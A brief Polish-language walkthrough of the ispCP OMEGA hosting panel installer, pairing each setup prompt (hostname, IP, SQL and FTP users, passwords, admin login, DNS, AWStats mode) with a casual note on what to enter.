Please enter a fully qualified hostname: tu nazwa kanoniczna serwera np ns1.domain.tld
Please enter the system network address: adres ip serwera
Please enter the domain name where ispCP OMEGA will be reachable on: tu podajemy gdzie ma być dostępny interfejs panelu np administracja.domain.tld
Please enter SQL server hostname: potwierdzamy enterem
Please enter ispCP OMEGA SQL database name: j.w
Please enter ispCP OMEGA SQL user name: j.w
Please enter ispCP OMEGA SQL password: tu wpisujemy hasło które wprowadziliśmy wcześniej a następnie przepisujemy je jeszcze raz dla potwierdzenia
Please enter ispCP FTP SQL user: zatwierdzamy
Please enter ispCP OMEGA FTP SQL user password: wiadomo hasełko
Please enter ispCP OMEGA PMA control user: zatwierdzamy
Please enter ispCP OMEGA PMA control user password: hasełko :)
Please enter administrator login name: zostawiamy admin
Please enter administrator password: i wprowadzamy hasełko
Secondary DNS server address IP (optional): tu podajemy adres drugiego adresu ip który wprowadzamy na interfejs
Do you want allow the system resolver to use the local nameserver? potwierdzamy
Should AWStats be activated? piszemy yes
Please select AWStats mode: Possible values [d]ynamic and [s]tatic. [dynamic]: zostawiamy dynamic
i to by było na tyle